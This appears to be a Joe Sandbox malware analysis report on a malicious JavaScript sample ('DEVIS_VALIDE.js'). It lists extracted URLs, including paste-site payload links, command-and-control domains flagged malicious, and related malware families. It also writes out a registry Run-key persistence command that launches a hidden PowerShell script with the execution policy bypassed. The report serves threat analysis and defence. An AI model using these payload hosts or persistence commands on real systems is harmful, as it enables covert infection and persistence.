https://cdnjs.cloudflare.com	powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micft.cMicRosof	powershell.exe, 00000005.00000002.2336065211.000002B6B2AC0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.1992997309.00000177D8CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896186167.000002B69A4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1895604908.0000024FE2531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2087771963.00000182AAD91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1930109525.00000220D3171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECDFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E680048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2229713334.0000020922D98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D2A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2332458861.000001709AAC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015585FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2361827508.0000025F80084000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2496598586.000001628D0FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D332D7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2666286370.000001D9870E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.2087171202.000002B6AA552000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1977461538.0000024FF25A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3165334469.00000220E31E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3165334469.00000220E3327000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1930109525.00000220D4AEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://masclauxtoitures.fr	powershell.exe, 00000004.00000002.1992997309.00000177DA574000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91C6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsoftEO	powershell.exe, 0000002C.00000002.2318654419.0000015584245000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000010.00000002.1930109525.00000220D33A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://paste.ee	powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.1896186167.000002B69A702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1895604908.0000024FE2752000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000010.00000002.1930109525.00000220D33A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000032.00000002.2496598586.000001628D6EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2666286370.000001D9875DD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://masclauxtoitures.fr	powershell.exe, 00000004.00000002.1992997309.00000177DA574000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.i	powershell.exe, 00000005.00000002.2334258140.000002B6B29B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com;	powershell.exe, 00000004.00000002.1992997309.00000177D9144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mic	powershell.exe, 00000005.00000002.2336065211.000002B6B2AC0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000010.00000002.1930109525.00000220D4AEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://masclauxtoitures.fr/X67h2024kNWORM.txtP	powershell.exe, 00000004.00000002.1992997309.00000177DA574000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.1930109525.00000220D33A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/d/Nbuiz/0P	powershell.exe, 00000004.00000002.1992997309.00000177DA476000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.1896186167.000002B69A702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1895604908.0000024FE2752000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/GF0ptUGb)	powershell.exe, 0000002C.00000002.3141181707.000001559E13A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/d/aGYNy/0P	powershell.exe, 00000004.00000002.1992997309.00000177D91EF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000004.00000002.1992997309.00000177D8CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896186167.000002B69A4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1895604908.0000024FE2531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2087771963.00000182AAD91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1930109525.00000220D3171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECDF7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECDF69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E68005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E68004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2229713334.0000020922D6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2229713334.0000020922D5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D27E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2332458861.000001709AA8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2332458861.000001709AA9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015585FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015585FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2361827508.0000025F80033000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2361827508.0000025F8005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2496598586.000001628D04E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2496598586.000001628D03B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pastebin.com	powershell.exe, 00000004.00000002.1992997309.00000177DA4F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECE7A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E680887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3DAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015586829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D333568000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com	powershell.exe, 00000004.00000002.1992997309.00000177DA4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECE788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E68086E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3DAA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015586824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.000001558681C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D33355A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D333562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	powershell.exe, 00000004.00000002.1992997309.00000177D9144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros	powershell.exe, 00000005.00000002.2334258140.000002B6B29B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2824594158.000001E6F71F8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.3.235	pastebin.com	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.97.3	paste.ee	European Union	13335	CLOUDFLARENETUS	false
64.235.43.128	masclauxtoitures.fr	United States	26277	PREMIANETUS	true
191.252.83.213	desckvbrat.com.br	Brazil	27715	LocawebServicosdeInternetSABR	true
178.73.218.6	moneyluck.duckdns.org	Sweden	42708	PORTLANEwwwportlanecomSE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559259
Start date and time:	2024-11-20 11:05:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	60
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DEVIS_VALIDE.js
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winJS@93/83@6/6
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 98% Number of executed functions: 75 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegAsm.exe, PID 2540 because it is empty
Execution Graph export aborted for target RegAsm.exe, PID 4080 because it is empty
Execution Graph export aborted for target RegAsm.exe, PID 8472 because it is empty
Execution Graph export aborted for target RegAsm.exe, PID 9004 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4944 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6276 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: DEVIS_VALIDE.js

Simulations

Behavior and APIs

Time	Type	Description
05:06:10	API Interceptor	1066069x Sleep call for process: powershell.exe modified
05:06:42	API Interceptor	1456311x Sleep call for process: RegAsm.exe modified
10:06:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nzm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
10:06:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_lme cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
10:06:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nzm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
10:06:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_lme cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.3.235	cr_asm3.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	gabe.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_atCAD.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	5UIy3bo46y.dll	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	Lm9IJ4r9oO.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	BeginSync lnk.lnk	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	sostener.vbs	Get hash	malicious	Njrat	Browse	pastebin.com/raw/V9y5Q5vv
149.154.167.220	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse
	new order #738833.exe	Get hash	malicious	GuLoader	Browse
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse
188.114.97.3	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
moneyluck.duckdns.org	download.exe	Get hash	malicious	Remcos, XWorm	Browse	188.126.90.3
paste.ee	ce.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3
	download.exe	Get hash	malicious	Remcos, XWorm	Browse	188.114.97.3
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	188.114.97.3
	Yeni sipari#U015f _TR-59647-WJO-001.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Scan112024.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Consulta de encomenda N#U00ba TM06-Q2-11-24.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Inquiry HA-22-28199 22-077.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	asegurar.vbs	Get hash	malicious	Remcos	Browse	188.114.96.3
api.telegram.org	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
CLOUDFLARENETUS	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	188.114.96.3
	http://mt6j71.p1keesoulharmony.com/	Get hash	malicious	HTMLPhisher, EvilProxy	Browse	104.21.36.30
	https://files-pdf-73j.pages.dev/?e=info@camida.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	172.67.74.152
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
CLOUDFLARENETUS	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	188.114.96.3
	http://mt6j71.p1keesoulharmony.com/	Get hash	malicious	HTMLPhisher, EvilProxy	Browse	104.21.36.30
	https://files-pdf-73j.pages.dev/?e=info@camida.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	172.67.74.152
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
PREMIANETUS	download.exe	Get hash	malicious	Remcos, XWorm	Browse	64.235.43.128
	Satan.mpsl.elf	Get hash	malicious	Unknown	Browse	64.235.45.196
	Satan.m68k.elf	Get hash	malicious	Mirai	Browse	64.235.45.196
	Satan.arm.elf	Get hash	malicious	Mirai	Browse	64.235.45.196
	Satan.arm6.elf	Get hash	malicious	Unknown	Browse	64.235.45.196
	Satan.i686.elf	Get hash	malicious	Unknown	Browse	64.235.45.196
	Satan.ppc.elf	Get hash	malicious	Unknown	Browse	64.235.45.196
	Satan.sh4.elf	Get hash	malicious	Unknown	Browse	64.235.45.196
	Satan.x86.elf	Get hash	malicious	Unknown	Browse	64.235.45.196
	Satan.arm7.elf	Get hash	malicious	Mirai	Browse	64.235.45.196

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	104.20.3.235 149.154.167.220 64.235.43.128 188.114.97.3
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	104.20.3.235 149.154.167.220 64.235.43.128 188.114.97.3
	________.exe	Get hash	malicious	Quasar	Browse	104.20.3.235 149.154.167.220 64.235.43.128 188.114.97.3
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.20.3.235 149.154.167.220 64.235.43.128 188.114.97.3
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	104.20.3.235 149.154.167.220 64.235.43.128 188.114.97.3
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	104.20.3.235 149.154.167.220 64.235.43.128 188.114.97.3
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	104.20.3.235 149.154.167.220 64.235.43.128 188.114.97.3
	order and drawings_pdf.exe	Get hash	malicious	AgentTesla	Browse	104.20.3.235 149.154.167.220 64.235.43.128 188.114.97.3
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.20.3.235 149.154.167.220 64.235.43.128 188.114.97.3
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.20.3.235 149.154.167.220 64.235.43.128 188.114.97.3

Dropped Files

⊘No context

